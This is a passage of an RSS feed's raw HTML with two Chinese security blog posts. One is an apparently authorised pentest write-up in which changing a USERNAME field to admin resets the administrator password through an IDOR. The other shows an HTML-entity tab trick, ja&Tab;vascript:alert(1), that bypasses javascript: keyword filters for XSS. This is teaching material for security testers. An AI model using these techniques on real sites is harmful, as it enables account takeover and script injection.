src="https://wechat2rss.xlab.app/img-proxy/?k=3d37e278&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F72I8gAalpPXibqxwW517rkmN4S5rDpm60U3I42HL1ZgpyUHPONJtliahq3c27GHk1FOUTmy5GibwwZZA1ersxT3xA1v7iclskSJgkqwozwGpJMM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">三下五除二，直接注册了一个测试账号张三，顺利登录系统，如下。</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1388888888888889" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100001945" src="https://wechat2rss.xlab.app/img-proxy/?k=2ad108a5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F72I8gAalpPVoNMT8IFONoBrrp4LvUw6tbT1f2klDVCLSAjwzPn5ftUmRCUzKASJNQEmp8PjXpDia4Mjef1sC5wUpekdc7SPX2qCMavSRz7rI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">但是吧，似乎功能有限，能见度有点低，为数不多的功能就是个人信息了，那就先看看这个吧，查看个人信息非/id类路由，无法越权查看，只能试试编辑和文件上传，emmmm，很显然这么早出场的一般都没有啥结果。</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001946" data-ratio="1.0314814814814814" data-s="300,640" type="block" data-type="png" data-w="1080" style="width:404px;height:417px;" src="https://wechat2rss.xlab.app/img-proxy/?k=1b2eb0eb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F72I8gAalpPXiaeQ4u0ichV816uMut3JxK6TDR1Bo3cJtBichvKoZkRXpsSFvogOJdO5r1RbReqdAGpD2JtEhKjIU0VlfTuYIbXNsQGg9aoBCC4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">啥也没有，可以看到编辑报文这里USER_ID目前为hash不易操作，但是似乎还有一个USERNAME，虽然一般都是使用</span><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-indent: 2em;&#34;},&#34;namespaceURI&#34;:&#34;&#34;}]">USER_ID做校验的，但是万一呢，直接修改</span><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-indent: 2em;&#34;},&#34;namespaceURI&#34;:&#34;&#34;}]">USERNAME为admin。</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001947" data-ratio="0.575" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=76053b22&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F72I8gAalpPXNX1otnrugxMuJGs0JhiadITvqT3K9W3GF9wT36olQicWRKQbTafhiajXObricDy4LsKY4VN6XBwtOzHicF0Sd9iaO1MzIdKCtS8rTc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">一如既往的修改成功，咋一看似乎没啥效果，使用admin+密码发现居然可以成功登录系统，好家伙，看来IDOR还真存在，居然直接给管理员密码给改掉了。</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001948" data-ratio="1.5253164556962024" data-s="300,640" type="block" data-type="png" data-w="316" src="https://wechat2rss.xlab.app/img-proxy/?k=d32419d5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F72I8gAalpPWsJO0QWGJemqGMibiblNWyETNIP9UGvoIrhxeX7fiaqNrVxf8IMWM0k6ybiak3SWibicGVtGxrMJ0nR51ViboFOKSsyW2icOkBm7STv28%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">不愧是管理员，权限就是不一般，赶紧和客户报备一下，管理员密码已修改。emmmm，剩下的测试就不做多述。</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001949" data-ratio="0.5791666666666667" data-s="300,640" type="block" data-type="png" data-w="960" src="https://wechat2rss.xlab.app/img-proxy/?k=e9afa209&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F72I8gAalpPWBltKASlIELkYw0KRI3IsTtwBtQniaj0NtaFNuvibfuib8jaQxiaR8tZOPSicgTyGXjG65mL5QhHbkDPlESamVtuZScyLH6ibUNR5Po%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">最后总结还是那句话，渗透难不难永远取决于开发大佬姿势骚不骚，收工。</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100012574" data-ratio="0.5493333333333333" data-s="300,640" data-w="750" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="box-sizing: border-box;text-align: center;display: inline-block;height: 38px;line-height: 42px;color: rgb(72, 179, 120);background-position: left center;background-repeat: no-repeat;background-attachment: initial;background-origin: initial;background-clip: initial;background-size: 63px;margin-top: 38px;font-size: 18px;margin-bottom: 10px;"><span leaf="">往期回顾</span></span></p><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=42515c71&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499419%26idx%3D1%26sn%3D6be89b80e7a9669ce7ee55b5be52b5f6">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 08 May 2026 10:01:00 +0800</pubDate>
    </item>
    <item>
      <title>js伪协议绕过</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499415&amp;idx=1&amp;sn=eaab070afebde33425a003fa9946f5cb</link>
      <description></description>
      <content:encoded><![CDATA[<p>原创 <span>h1</span> <span>2026-05-07 10:01</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=834a9098&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F7xtecWUgCRweGiaNhic3OMibhZ3BGqZJBlhCMxhse720uKX2h2IsDKwSsTvYO3R3TjJnMgVLKXibWYKldasBMqc4KDWUUg1lBGGoLp7rBTgo80M%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=761fb13a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRxtmfzrciaQiaB8QLqmqzmQkvMicslWNIeOHumRzKL3P3p5SmlRzNCcUKApZ1FyTsIYrro1f0sSt9icVrD6zNVwnpp6J2fF605EGGo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">正文</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">HTML Entity 绕过</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">&lt;a href=</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;ja&amp;Tab;vascript:alert(1)&#34;</span></span><span leaf="">&gt;</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">👉 浏览器解析：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">&amp;Tab; → \t（制表符）</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">最终：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">javascript:alert(1)</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">原理 HTML 会自动 decode 实体</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">javascript: 被拆开 → 绕过关键字检测</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100012574" data-ratio="0.5493333333333333" data-s="300,640" data-w="750" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="box-sizing: border-box;text-align: center;display: inline-block;height: 38px;line-height: 42px;color: rgb(72, 179, 120);background-position: left center;background-repeat: no-repeat;background-attachment: initial;background-origin: initial;background-clip: initial;background-size: 63px;margin-top: 38px;font-size: 18px;margin-bottom: 10px;"><span leaf="">往期回顾</span></span></p><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=861238ef&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499415%26idx%3D1%26sn%3Deaab070afebde33425a003fa9946f5cb">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 07 May 2026 10:01:00 +0800</pubDate>
    </item>
    <item>
      <title>利用302实现xss的一个思路</title>
